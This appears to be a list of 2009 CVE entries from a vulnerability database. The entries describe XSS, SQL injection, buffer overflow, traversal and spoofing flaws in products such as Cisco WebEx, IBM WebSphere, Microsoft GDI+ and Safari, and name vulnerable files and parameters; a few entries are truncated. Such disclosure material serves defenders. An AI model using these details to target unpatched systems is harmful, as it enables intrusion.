[CVE-2009-3029] Cross-site scripting (XSS) vulnerability in the console in Symantec SecurityExpressions Audit and Compliance Server 4.1.1, 4.1, and earlier allows remote authenticated users to inject arbitrary web script or HTML via "external client input" that triggers crafted error messages.
[CVE-2009-3027] VRTSweb.exe in VRTSweb in Symantec Backup Exec Continuous Protection Server (CPS) 11d, 12.0, and 12.5
[CVE-2009-3021] Cross-site scripting (XSS) vulnerability in Site Calendar 'mycaljp' plugin 2.0.0 through 2.0.6, as used in the Japanese extended package of Geeklog 1.5.0 through 1.5.2 and when distributed 20090629 or earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-3015] QtWeb 3.0 Builds 001 and 003 does not properly block javascript: and data: URIs in Refresh and Location headers in HTTP responses, which allows remote attackers to conduct cross-site scripting (XSS) attacks via vectors related to (1) injecting a Refresh header that contains a javascript: URI, (2) entering a javascript: URI when specifying the content of a Refresh header, (3) injecting a Refresh header that contains JavaScript sequences in a data:text/html URI, (4) entering a data:text/html URI with JavaScript sequences when specifying the content of a Refresh header, (5) injecting a Location header that contains JavaScript sequences in a data:text/html URI, or (6) entering a data:text/html URI with JavaScript sequences when specifying the content of a Location header.
[CVE-2009-3009] Cross-site scripting (XSS) vulnerability in Ruby on Rails 2.x before 2.2.3, and 2.3.x before 2.3.4, allows remote attackers to inject arbitrary web script or HTML by placing malformed Unicode strings into a form helper.
[CVE-2009-3006] Maxthon Browser 2.5.3.80 UNICODE allows remote attackers to spoof the address bar, via window.open with a relative URI, to show an arbitrary URL on the web site visited by the victim, as demonstrated by a visit to an attacker-controlled web page, which triggers a spoofed login form for the site containing that page.
[CVE-2009-3005] Lunascape 5.1.3 and 5.1.4 allows remote attackers to spoof the address bar, via window.open with a relative URI, to show an arbitrary URL on the web site visited by the victim, as demonstrated by a visit to an attacker-controlled web page, which triggers a spoofed login form for the site containing that page. NOTE: a related attack was reported in which an arbitrary file: URL is shown.
[CVE-2009-3004] Avant Browser 11.7 Builds 35 and 36 allows remote attackers to spoof the address bar, via window.open with a relative URI, to show an arbitrary URL on the web site visited by the victim, as demonstrated by a visit to an attacker-controlled web page, which triggers a spoofed login form for the site containing that page. NOTE: a related attack was reported in which an arbitrary file: URL is shown.
[CVE-2009-3003] Microsoft Internet Explorer 6 through 8 allows remote attackers to spoof the address bar, via window.open with a relative URI, to show an arbitrary URL on the web site visited by the victim, as demonstrated by a visit to an attacker-controlled web page, which triggers a spoofed login form for the site containing that page.
[CVE-2009-3000] The sockfs module in the kernel in Sun Solaris 10 and OpenSolaris snv_41 through snv_122, when Network Cache Accelerator (NCA) logging is enabled, allows remote attackers to cause a denial of service (panic) via unspecified web-server traffic that triggers a NULL pointer dereference in the nl7c_http_log function, related to "improper http response handling."
[CVE-2009-2967] Multiple cross-site scripting (XSS) vulnerabilities in Buildbot 0.7.6 through 0.7.11p2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, different vulnerabilities than CVE-2009-2959.
[CVE-2009-2965] Cross-site scripting (XSS) vulnerability in entry/index.jsp in Radvision Scopia 5.7, and possibly other versions before SD 7.0.100, allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2009-2963] Unspecified vulnerability in the update feature in Toolbar Uninstaller 1.0.2 allows remote attackers to force the download and execution of arbitrary files via attack vectors related to a "malformed update url and a malformed update website."
[CVE-2009-2959] Cross-site scripting (XSS) vulnerability in the waterfall web status view (status/web/waterfall.py) in Buildbot 0.7.6 through 0.7.11p1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2956] The (1) Net.Commerce and (2) Net.Data components in IBM WebSphere Commerce Suite store sensitive information under the web root with insufficient access control, which allows remote attackers to discover passwords, and database and filesystem details, via direct requests for configuration files.
[CVE-2009-2947] Cross-site scripting (XSS) vulnerability in Xapian Omega before 1.0.16 allows remote attackers to inject arbitrary web script or HTML via unspecified CGI parameter values, which are sometimes included in exception messages.
[CVE-2009-2945] weblogin/login.fcgi (aka the WebLogin login script) in Stanford University WebAuth 3.5.5, 3.6.0, and 3.6.1 places passwords in URLs in certain circumstances involving conversion of a POST request to a GET request, which allows context-dependent attackers to discover passwords by reading (1) web-server access logs, (2) web-server Referer logs, or (3) the browser history.
[CVE-2009-2937] Cross-site scripting (XSS) vulnerability in Planet 2.0 and Planet Venus allows remote attackers to inject arbitrary web script or HTML via the SRC attribute of an IMG element in a feed.
[CVE-2009-2936] ** DISPUTED ** The Command Line Interface (aka Server CLI or administration interface) in the master process in the reverse proxy server in Varnish before 2.1.0 does not require authentication for commands received through a TCP port, which allows remote attackers to (1) execute arbitrary code via a vcl.inline directive that provides a VCL configuration file containing inline C code
[CVE-2009-2932] Cross-site scripting (XSS) vulnerability in uddiclient/process in the UDDI client in SAP NetWeaver Application Server (Java) 7.0 allows remote attackers to inject arbitrary web script or HTML via the TModel Key field.
[CVE-2009-2930] Cross-site scripting (XSS) vulnerability in the Search feature in elka CMS (aka Elkapax) allows remote attackers to inject arbitrary web script or HTML via the q parameter to the default URI.
[CVE-2009-2928] Cross-site scripting (XSS) vulnerability in login.php in TGS Content Management 0.x allows remote attackers to inject arbitrary web script or HTML via the previous_page parameter, a different vector than CVE-2008-6839.
[CVE-2009-2920] Multiple cross-site scripting (XSS) vulnerabilities in Elvin 1.2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) component and (2) priority parameters to buglist.php.
[CVE-2009-2919] Cross-site scripting (XSS) vulnerability in Boonex Orca 2.0 and 2.0.2 allows remote authenticated users to inject arbitrary web script or HTML via the topic title field.
[CVE-2009-2914] Cross-site scripting (XSS) vulnerability in index.php in XZero Community Classifieds 4.97.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the name of an uploaded file. NOTE: the provenance of this information is unknown.
[CVE-2009-2913] Cross-site scripting (XSS) vulnerability in index.php in XZero Community Classifieds 4.97.8 allows remote attackers to inject arbitrary web script or HTML via the URI. NOTE: the provenance of this information is unknown.
[CVE-2009-2907] Multiple cross-site scripting (XSS) vulnerabilities in SpringSource tc Server 6.0.20.B and earlier, Application Management Suite (AMS) before 2.0.0.SR4, Hyperic HQ Open Source before 4.2.x, Hyperic HQ 4.0 Enterprise before 4.0.3.2, and Hyperic HQ 4.1 Enterprise before 4.1.2.1 allow remote attackers to inject arbitrary web script or HTML via the description field and unspecified "input fields."
[CVE-2009-2893] Multiple cross-site scripting (XSS) vulnerabilities in index.php in XZero Community Classifieds 4.97.8 allow remote attackers to inject arbitrary web script or HTML via (1) the postevent parameter in a post action or (2) the _xzcal_y parameter.
[CVE-2009-2890] Cross-site scripting (XSS) vulnerability in results.php in PHP Scripts Now Riddles allows remote attackers to inject arbitrary web script or HTML via the searchquery parameter.
[CVE-2009-2889] Cross-site scripting (XSS) vulnerability in index.php in PHP Scripts Now Hangman allows remote attackers to inject arbitrary web script or HTML via the letters parameter.
[CVE-2009-2887] Cross-site scripting (XSS) vulnerability in bios.php in PHP Scripts Now President Bios allows remote attackers to inject arbitrary web script or HTML via the rank parameter.
[CVE-2009-2884] Cross-site scripting (XSS) vulnerability in bios.php in PHP Scripts Now World's Tallest Buildings allows remote attackers to inject arbitrary web script or HTML via the rank parameter.
[CVE-2009-2882] Multiple cross-site scripting (XSS) vulnerabilities in PG MatchMaking allow remote attackers to inject arbitrary web script or HTML via the show parameter to (1) browse_ladies.php and (2) browse_men.php, the (3) gender parameter to search.php, and the (4) id parameter to services.php.
[CVE-2009-2880] Buffer overflow in atrpui.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WebEx Recording Format (WRF) file.
[CVE-2009-2879] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2876 and CVE-2009-2878.
[CVE-2009-2878] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2876 and CVE-2009-2879.
[CVE-2009-2877] Stack-based buffer overflow in ataudio.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file.
[CVE-2009-2876] Heap-based buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 (aka T26SP49EP32) for Windows, 27.x before 27.10.x (aka T27SP10) for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a crafted WebEx Recording Format (WRF) file, a different vulnerability than CVE-2009-2878 and CVE-2009-2879.
[CVE-2009-2875] Buffer overflow in atas32.dll in the Cisco WebEx WRF Player 26.x before 26.49.32 for Windows, 27.x before 27.10.x for Windows, 26.x before 26.49.35 for Mac OS X and Linux, and 27.x before 27.11.8 for Mac OS X and Linux allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted WebEx Recording Format (WRF) file.
[CVE-2009-2863] Race condition in the Firewall Authentication Proxy feature in Cisco IOS 12.0 through 12.4 allows remote attackers to bypass authentication, or bypass the consent web page, via a crafted request, aka Bug ID CSCsy15227.
[CVE-2009-2842] Apple Safari before 4.0.4 does not properly implement certain (1) Open Image and (2) Open Link menu options, which allows remote attackers to read local HTML files via a crafted web site.
[CVE-2009-2841] The HTMLMediaElement::loadResource function in html/HTMLMediaElement.cpp in WebCore in WebKit before r49480, as used in Apple Safari before 4.0.4 on Mac OS X, does not perform the expected callbacks for HTML 5 media elements that have external URLs for media resources, which allows remote attackers to trigger sub-resource requests to arbitrary web sites via a crafted HTML document, as demonstrated by an HTML e-mail message that uses a media element for X-Confirm-Reading-To functionality, aka rdar problem 7271202.
[CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
[CVE-2009-2816] The implementation of Cross-Origin Resource Sharing (CORS) in WebKit, as used in Apple Safari before 4.0.4 and Google Chrome before 3.0.195.33, includes certain custom HTTP headers in the OPTIONS request during cross-origin operations with preflight, which makes it easier for remote attackers to conduct cross-site request forgery (CSRF) attacks via a crafted web page.
[CVE-2009-2814] Cross-site scripting (XSS) vulnerability in the Wiki Server in Apple Mac OS X 10.5.8 allows remote attackers to inject arbitrary web script or HTML via a search request containing data that does not use UTF-8 encoding.
[CVE-2009-2812] Launch Services in Apple Mac OS X 10.5.8 does not properly recognize an unsafe Uniform Type Identifier (UTI) in an exported document type in a downloaded application, which allows remote attackers to trigger the automatic opening of a file, and execute arbitrary code, via a crafted web site.
[CVE-2009-2808] Help Viewer in Apple Mac OS X before 10.6.2 does not use an HTTPS connection to retrieve Apple Help content from a web site, which allows man-in-the-middle attackers to send a crafted help:runscript link, and thereby execute arbitrary code, via a spoofed response.
[CVE-2009-2797] The WebKit component in Safari in Apple iPhone OS before 3.1, and iPhone OS before 3.1.1 for iPod touch, does not remove usernames and passwords from URLs sent in Referer headers, which allows remote attackers to obtain sensitive information by reading Referer logs on a web server.
[CVE-2009-2791] PHP remote file inclusion vulnerability in pda_projects.php in WebDynamite ProjectButler 1.5.0 allows remote attackers to execute arbitrary PHP code via a URL in the offset parameter.
[CVE-2009-2785] Multiple cross-site scripting (XSS) vulnerabilities in PHP Open Classifieds Script allow remote attackers to inject arbitrary web script or HTML via the (1) page parameter to buy.php and the id parameter to (2) contact.php and (3) tellafriend.php.
[CVE-2009-2783] Multiple cross-site scripting (XSS) vulnerabilities in XOOPS 2.3.3 allow remote attackers to inject arbitrary web script or HTML via the (1) op parameter to modules/pm/viewpmsg.php and (2) query string to modules/profile/user.php.
[CVE-2009-2780] Multiple cross-site scripting (XSS) vulnerabilities in 68 Classifieds 4.1 allow remote attackers to inject arbitrary web script or HTML via the (1) cat parameter to category.php, view parameter to (2) login.php and (3) viewlisting.php, page parameter to (4) searchresults.php and (5) toplistings.php, and (6) member parameter to viewmember.php.
[CVE-2009-2778] Cross-site scripting (XSS) vulnerability in visitor/view.php in GarageSales Script allows remote attackers to inject arbitrary web script or HTML via the key parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-2772] Multiple cross-site scripting (XSS) vulnerabilities in PG Roommate Finder Solution allow remote attackers to inject arbitrary web script or HTML via the part parameter to (1) quick_search.php and (2) viewprofile.php.
[CVE-2009-2771] Cross-site scripting (XSS) vulnerability in Free Arcade Script 1.3 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter to the default URI under search/.
[CVE-2009-2752] IBM WebSphere Commerce 7.0 does not properly encrypt data in a database, which makes it easier for local users to obtain sensitive information by defeating cryptographic protection mechanisms.
[CVE-2009-2751] IBM WebSphere Commerce 7.0 uses the same cryptographic key for session attributes and merchant data encryption, which has unspecified impact and remote attack vectors.
[CVE-2009-2750] IBM WebSphere Service Registry and Repository (WSRR) 6.3.0 before FP2 does not have the intended configuration properties, which allows remote authenticated users to obtain unspecified data access via a property query.
[CVE-2009-2749] Feature Pack for Communications Enabled Applications (CEA) before 1.0.0.1 for IBM WebSphere Application Server 7.0.0.7 uses predictable session values, which allows man-in-the-middle attackers to spoof a collaboration session by guessing the value.
[CVE-2009-2748] Cross-site scripting (XSS) vulnerability in the Administration Console in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.29 and 7.1 before 7.0.0.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2746] Cross-site request forgery (CSRF) vulnerability in the administrative console in the Security component in IBM WebSphere Application Server (WAS) 6.0.2 before 6.0.2.39, 6.1 before 6.1.0.29, and 7.0 before 7.0.0.7 allows remote attackers to hijack the authentication of administrators via unspecified vectors.
[CVE-2009-2744] Unspecified vulnerability in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.27 allows remote attackers to cause a denial of service via unknown vectors, related to "an error in fixpacks 6.1.0.23 and 6.1.0.25."
[CVE-2009-2743] IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.27, and 7.0 before 7.0.0.7, does not properly handle an exception occurring after use of wsadmin scripts and configuration of JAAS-J2C Authentication Data, which allows local users to obtain sensitive information by reading the First Failure Data Capture (FFDC) log file.
[CVE-2009-2742] Cross-site scripting (XSS) vulnerability in Eclipse Help in IBM WebSphere Application Server (WAS) 6.1 before 6.1.0.27 allows remote attackers to inject arbitrary web script or HTML via unspecified input.
[CVE-2009-2741] Unspecified vulnerability in the wberuntimeear application in the test servlet in IBM WebSphere Business Events 6.1 and 6.2 allows remote attackers to execute arbitrary code via unknown vectors.
[CVE-2009-2739] Cross-site scripting (XSS) vulnerability in FreeNAS before 0.69.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2009-2738] Cross-site request forgery (CSRF) vulnerability in the WebGUI in FreeNAS before 0.7RC1 allows remote attackers to hijack the authentication of users for unspecified requests via unknown vectors.
[CVE-2009-2733] Multiple cross-site scripting (XSS) vulnerabilities in Achievo before 1.4.0 allow remote attackers to inject arbitrary web script or HTML via (1) the scheduler title in the scheduler module, and the (2) atksearch[contractnumber], (3) atksearch_AE_customer[customer], (4) atksearchmode[contracttype], and possibly (5) atksearch[contractname] parameters to the Organization Contracts administration page, reachable through dispatch.php.
[CVE-2009-2719] The Java Web Start implementation in Sun Java SE 6 before Update 15 allows context-dependent attackers to cause a denial of service (NullPointerException) via a crafted .jnlp file, as demonstrated by the jnlp_file/appletDesc/index.html#misc test in the Technology Compatibility Kit (TCK) for the Java Network Launching Protocol (JNLP).
[CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
[CVE-2009-2685] Stack-based buffer overflow in the login form in the management web server in HP Power Manager allows remote attackers to execute arbitrary code via the Login variable.
[CVE-2009-2684] Multiple cross-site scripting (XSS) vulnerabilities in Jetdirect and the Embedded Web Server (EWS) on certain HP LaserJet and Color LaserJet printers, and HP Digital Senders, allow remote attackers to inject arbitrary web script or HTML via the (1) Product_URL or (2) Tech_URL parameter in an Apply action to the support_param.html/config script.
[CVE-2009-2680] Unspecified vulnerability in the Remote Management Interface (RMI) for MSL Tape Libraries and 1/8 G2 Tape Autoloaders in HP StorageWorks 1/8 G2 Tape Autoloader firmware 2.30 and earlier, MSL2024 Tape Library firmware 4.20 and earlier, MSL4048 Tape Library firmware 6.50 and earlier, and MSL8096 Tape Library firmware 8.90 and earlier allows remote attackers to cause a denial of service via unknown vectors.
[CVE-2009-2674] Integer overflow in javaws.exe in Sun Java Web Start in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 allows context-dependent attackers to execute arbitrary code via a crafted JPEG image that is not properly handled during display to a splash screen, which triggers a heap-based buffer overflow.
[CVE-2009-2672] The proxy mechanism implementation in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15, and JDK and JRE 5.0 before Update 20, does not prevent access to browser cookies by untrusted (1) applets and (2) Java Web Start applications, which allows remote attackers to hijack web sessions via unspecified vectors.
[CVE-2009-2671] The SOCKS proxy implementation in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15, and JDK and JRE 5.0 before Update 20, allows remote attackers to discover the username of the account that invoked an untrusted (1) applet or (2) Java Web Start application via unspecified vectors.
[CVE-2009-2670] The audio system in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15, and JDK and JRE 5.0 before Update 20, does not prevent access to java.lang.System properties by (1) untrusted applets and (2) Java Web Start applications, which allows context-dependent attackers to obtain sensitive information by reading these properties.
[CVE-2009-2665] The nsDocument::SetScriptGlobalObject function in content/base/src/nsDocument.cpp in Mozilla Firefox 3.5.x before 3.5.2, when certain add-ons are enabled, does not properly handle a Link HTTP header, which allows remote attackers to execute arbitrary JavaScript with chrome privileges via a crafted web page, related to an incorrect security wrapper.
[CVE-2009-2654] Mozilla Firefox before 3.0.13, and 3.5.x before 3.5.2, allows remote attackers to spoof the address bar, and possibly conduct phishing attacks, via a crafted web page that calls window.open with an invalid character in the URL, makes document.write calls to the resulting object, and then calls the stop method during the loading of the error page.
[CVE-2009-2636] Cross-site scripting (XSS) vulnerability in the Integration page in the WebMail component in Kerio MailServer 6.6.0, 6.6.1, 6.6.2, and 6.7.0 allows remote attackers to inject arbitrary web script or HTML via an e-mail message.
[CVE-2009-2631] Multiple clientless SSL VPN products that run in web browsers, including Stonesoft StoneGate
[CVE-2009-2615] Multiple cross-site scripting (XSS) vulnerabilities in DataCheck Solutions SitePal 1.x allow remote attackers to inject arbitrary web script or HTML via the page parameter to (1) z_admin_login.asp, (2) z_forgot.asp, and possibly unspecified other components. NOTE: the provenance of this information is unknown
[CVE-2009-2613] Multiple cross-site scripting (XSS) vulnerabilities in DataCheck Solutions LinkPal 1.x allow remote attackers to inject arbitrary web script or HTML via the page parameter to (1) z_loginfailed.asp, (2) z_admin_login.asp, (3) z_forgot.asp, and possibly unspecified other components. NOTE: the provenance of this information is unknown
[CVE-2009-2610] Cross-site scripting (XSS) vulnerability in the Links Related module in the Links Package 5.x before 5.x-1.13 and 6.x before 6.x-1.2, a module for Drupal, allows remote authenticated users to inject arbitrary web script or HTML via the title field.
[CVE-2009-2606] ASP Football Pool 2.3 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for NFL.mdb.
[CVE-2009-2602] R2 Newsletter Lite, Pro, and Stats stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database file via a direct request for admin.mdb.
[CVE-2009-2600] Multiple directory traversal vulnerabilities in view.php in Webboard 2.90 beta and earlier allow remote attackers to read arbitrary files via a .. (dot dot) in the topic parameter.
[CVE-2009-2597] The Sun Java System (SJS) Access Manager Policy Agent module 2.2 for SJS Web Proxy Server 4.0 allows remote attackers to cause a denial of service (daemon crash) via a GET request.
[CVE-2009-2595] Cross-site scripting (XSS) vulnerability in productSearch.html in Censura 2.0.4 and 2.1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a ProductSearch action.
[CVE-2009-2594] Cross-site scripting (XSS) vulnerability in censura.php in Censura 1.16.04 allows remote attackers to inject arbitrary web script or HTML via the itemid parameter in a details action.
[CVE-2009-2590] SQL injection vulnerability in showcategory.php in Hutscripts PHP Website Script allows remote attackers to execute arbitrary SQL commands via the cid parameter.
[CVE-2009-2589] Multiple cross-site scripting (XSS) vulnerabilities in Hutscripts PHP Website Script allow remote attackers to inject arbitrary web script or HTML via the msg parameter to (1) feedback.php, (2) index.php, and (3) lostpassword.php.
[CVE-2009-2588] Multiple cross-site scripting (XSS) vulnerabilities in Hotscripts Type PHP Clone Script allow remote attackers to inject arbitrary web script or HTML via the msg parameter to (1) feedback.php, (2) index.php, and (3) lostpassword.php.
[CVE-2009-2587] Multiple cross-site scripting (XSS) vulnerabilities in DragDropCart allow remote attackers to inject arbitrary web script or HTML via the (1) sid parameter to assets/js/ddcart.php, the (2) prefix parameter to includes/ajax/getstate.php, the search parameter to (3) index.php and (4) search.php, the (5) redirect parameter to login.php, and the (6) product parameter to productdetail.php.
[CVE-2009-2586] Cross-site scripting (XSS) vulnerability in articles.php in EDGEPHP EZArticles allows remote attackers to inject arbitrary web script or HTML via the title parameter.
[CVE-2009-2582] Stack-based buffer overflow in manager.exe in Akamai Download Manager (aka DLM or dlmanager) before 2.2.4.8 allows remote web servers to execute arbitrary code via a malformed HTTP response during a Redswoosh download, a different vulnerability than CVE-2007-1891 and CVE-2007-1892.
[CVE-2009-2581] Cross-site scripting (XSS) vulnerability in modifier.php in EditeurScripts EsNews 1.2 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2009-2571] Multiple cross-site scripting (XSS) vulnerabilities in index.php in VerliAdmin 0.3.7 and 0.3.8 allow remote attackers to inject arbitrary web script or HTML via (1) the URI, (2) the q parameter, (3) the nick parameter, or (4) the nick parameter in a bantest action.
[CVE-2009-2569] Multiple cross-site scripting (XSS) vulnerabilities in Verlihub Control Panel (VHCP) 1.7e allow remote attackers to inject arbitrary web script or HTML via (1) the nick parameter in a login action to index.php or (2) the URI in a news request to index.html.
[CVE-2009-2565] Cross-site scripting (XSS) vulnerability in Perl CGI's By Mrs. Shiromuku shiromuku(fs6)DIARY 2.40 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-2551] Multiple cross-site scripting (XSS) vulnerabilities in ScriptsEz Easy Image Downloader allow remote attackers to inject arbitrary web script or HTML via the id parameter in a detail action to (1) main.php and possibly (2) demo_page.php.
[CVE-2009-2541] The web browser on the Sony PLAYSTATION 3 (PS3) allows remote attackers to cause a denial of service (memory consumption and console hang) via a large integer value for the length property of a Select object, a related issue to CVE-2009-1692.
[CVE-2009-2519] The DHTML Editing Component ActiveX control in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly format HTML markup, which allows remote attackers to execute arbitrary code via a crafted web site that triggers "system state" corruption, aka "DHTML Editing Component ActiveX Control Vulnerability."
[CVE-2009-2513] The Graphics Device Interface (GDI) in win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient Data Validation Vulnerability."
[CVE-2009-2512] The Web Services on Devices API (WSDAPI) in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 does not properly process the headers of WSD messages, which allows remote attackers to execute arbitrary code via a crafted (1) message or (2) response, aka "Web Services on Devices API Memory Corruption Vulnerability."
[CVE-2009-2509] Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly validate headers in HTTP requests, which allows remote authenticated users to execute arbitrary code via a crafted request to an IIS web server, aka "Remote Code Execution in ADFS Vulnerability."
[CVE-2009-2508] The single sign-on implementation in Active Directory Federation Services (ADFS) in Microsoft Windows Server 2003 SP2 and Server 2008 Gold and SP2 does not properly remove credentials at the end of a network session, which allows physically proximate attackers to obtain the credentials of a previous user of the same web browser by using data from the browser's cache, aka "Single Sign On Spoofing in ADFS Vulnerability."
[CVE-2009-2504] Multiple integer overflows in unspecified APIs in GDI+ in Microsoft .NET Framework 1.1 SP1, .NET Framework 2.0 SP1 and SP2, Windows XP SP2 and SP3, Windows Server 2003 SP2, Vista Gold and SP1, Server 2008 Gold, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allow remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP), (2) a crafted ASP.NET application, or (3) a crafted .NET Framework application, aka "GDI+ .NET API Vulnerability."
[CVE-2009-2503] GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Windows Server 2003 SP2, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 does not properly allocate an unspecified buffer, which allows remote attackers to execute arbitrary code via a crafted TIFF image file that triggers memory corruption, aka "GDI+ TIFF Memory Corruption Vulnerability."
[CVE-2009-2502] Buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted TIFF image file, aka "GDI+ TIFF Buffer Overflow Vulnerability."
[CVE-2009-2501] Heap-based buffer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Heap Overflow Vulnerability."
[CVE-2009-2500] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted WMF image file, aka "GDI+ WMF Integer Overflow Vulnerability."
